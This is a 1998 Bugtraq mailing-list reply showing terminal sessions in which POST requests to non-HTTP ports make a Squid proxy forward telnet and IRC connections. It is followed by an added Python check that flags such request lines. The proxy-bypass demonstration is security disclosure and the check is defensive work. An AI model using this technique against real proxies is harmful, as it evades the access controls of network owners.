[8210] in bugtraq
Re: [NTSEC] By-passing MS Proxy 2.0 and others packet filtering
daemon@ATHENA.MIT.EDU (Peter van Dijk)
Wed Oct 14 15:17:17 1998
Mail-Followup-To: BUGTRAQ@NETSPACE.ORG
Date: Tue, 13 Oct 1998 23:08:44 +0200
Reply-To: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
From: Peter van Dijk <peter@ATTIC.VUURWERK.NL>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199810090546.HAA22037@champagne.edelweb.fr>; from
Jean-Christophe Touvet on Fri, Oct 09, 1998 at 07:46:38AM +0200
On Fri, Oct 09, 1998 at 07:46:38AM +0200, Jean-Christophe Touvet wrote:
> > Date: Thu, 08 Oct 1998 08:27:36 +0100
> > From: "Mnemonix" <mnemonix@globalnet.co.uk>
> >
> > Firstly it seems that most web-based proxies, not just MS Proxy, are
> > susceptible to this kind of attack. Thanks to Greg Jones and others for
> > doing some testing on this.
>
> HTTP POST is limited: telnet, NetBios etc. will not work, while CONNECT will
> pass them straightforward.
Very untrue. Look at this:
[hardbeat@haarlem hardbeat]$ telnet proxy 8080
Trying 194.178.232.18...
Connected to rotterdam.vuurwerk.nl.
Escape character is '^]'.
POST http://telnet:23/ HTTP/1.0
VuurWerk Internet Telnet Server
(telnet.vuurwerk.nl)
Alle transacties worden gelogged, het gebruik
van deze server is alleen voor klanten van
VuurWerk tbv. het onderhoud van hun eigen site.
POST / HTTP/1.0
Via: 1.0 rotterdam.vuurwerk.nl:8080 (Squid/1.1.21)
X-Forwarded-For: 194.178.232.22
Host: telnet.vuurwerk.nl
Cache-control: Max-age=259200
login: hardbeat
Password:
Last login: Tue Oct 13 22:59:49 from rotterdam
PID TTY STAT TIME COMMAND
5896 p6 S 0:00 /bin/login -h p8ur.cistron.nl -p
5901 p6 S 0:00 \_ -bash
6175 p6 S 0:00 \_ telnet proxy 8080
6186 p8 S 0:00 /bin/login -h rotterdam vuurwerk.nl -p
6190 p8 S 0:00 \_ -bash
6205 p8 R 0:00 \_ ps xfww
[hardbeat@haarlem hardbeat]$
Haarlem is the shellmachine here, also CNAMEd telnet. The proxy (Squid/1.1.21)
will happily forward me, and telnet works as if there's no proxy in between.
Another great example:
[hardbeat@haarlem hardbeat]$ telnet proxy 8080
Trying 194.178.232.18...
Connected to rotterdam.vuurwerk.nl.
Escape character is '^]'.
POST http://irc.pi.net:6667/ HTTP/1.0
nick Hardbeat2
PING :1693634679
PONG 1693634679
USER hardbeat haarlem.vuurwerk.nl irc.pi.net :Peter van Dijk (via proxy)
:Antwerpen.Be.Eu.Undernet.org 001 Hardbeat2 :Welcome to the Internet Relay Network Hardbeat2
:Antwerpen.Be.Eu.Undernet.org 002 Hardbeat2 :Your host is Antwerpen.Be.Eu.Undernet.org, running version u2.10.04
:Antwerpen.Be.Eu.Undernet.org 003 Hardbeat2 :This server was created Fri Jun 19 1998 at 18:44:36 MET DST
I can happily IRC now... imagine how easy it would be to write an IRC bouncer
that uses a proxy. Lots of proxies have NO acl or firewall around them.
The only thing I have _not_ succeeded in until now is chaining proxies with
GET or POST requests.
Greetz, Peter.
--
'I guess anybody who walks away from a root shell at : Peter van Dijk
a nerd party gets what they deserve!' -- BillSF :peter@attic.vuurwerk.nl
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
finger peter@jamaica.xs4all.nl for my public PGP-key
- --- - --- - --- - --- - --- - --- - --- - --- - --- -
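Added example (not from the post, and not Squid's own code): a defender-side port check, in Python, that parses proxy-style request lines such as the `POST http://telnet:23/ HTTP/1.0` and `POST http://irc.pi.net:6667/ HTTP/1.0` lines above and refuses destinations outside an allow-list of HTTP ports, the kind of rule a proxy ACL enforces or a log audit over the URL field would apply after the fact. The allow-list, the CONNECT handling and the sample request lines are constructed for the example; it also covers CONNECT request lines, which the post does not show.

```python
import re
from urllib.parse import urlsplit

# Constructed allow-list: ports plain requests may reach, and the one port CONNECT may tunnel to.
ALLOWED_PORTS = {"CONNECT": {443}, "DEFAULT": {80, 443, 8080}}
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)\s+HTTP/\d\.\d$")

def parse_request_line(line):
    """Return (method, host, port) for a proxy-style request line, else None."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return None
    method, target = m.group("method"), m.group("target")
    if method == "CONNECT":  # CONNECT carries host:port directly, no scheme
        host, _, port = target.rpartition(":")
        return (method, host, int(port)) if host and port.isdigit() else None
    try:
        parts = urlsplit(target)
        port = parts.port  # ValueError on a non-numeric or out-of-range port
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    return method, parts.hostname, port

def policy(line):
    """Decide 'allow' or 'deny' for one request line, with a reason."""
    parsed = parse_request_line(line)
    if parsed is None:
        return "deny", "malformed request line"
    method, host, port = parsed
    allowed = ALLOWED_PORTS.get(method, ALLOWED_PORTS["DEFAULT"])
    if port in allowed:
        return "allow", f"{method} {host}:{port}"
    return "deny", f"{method} {host}:{port} is not an HTTP port"

def audit(lines):
    """Return the request lines a port-aware ACL would have refused."""
    return [line for line in lines if policy(line)[0] == "deny"]

# Constructed sample: the two request lines from the post plus ordinary traffic.
SAMPLE_REQUESTS = [
    "POST http://telnet:23/ HTTP/1.0",
    "POST http://irc.pi.net:6667/ HTTP/1.0",
    "GET http://www.example.com/ HTTP/1.0",
    "CONNECT www.example.com:443 HTTP/1.0",
    "CONNECT mail.example.com:25 HTTP/1.0",
]
```

Running `audit(SAMPLE_REQUESTS)` returns the telnet, IRC and SMTP lines; a request with no explicit port defaults to 80 (or 443 for https) before the check.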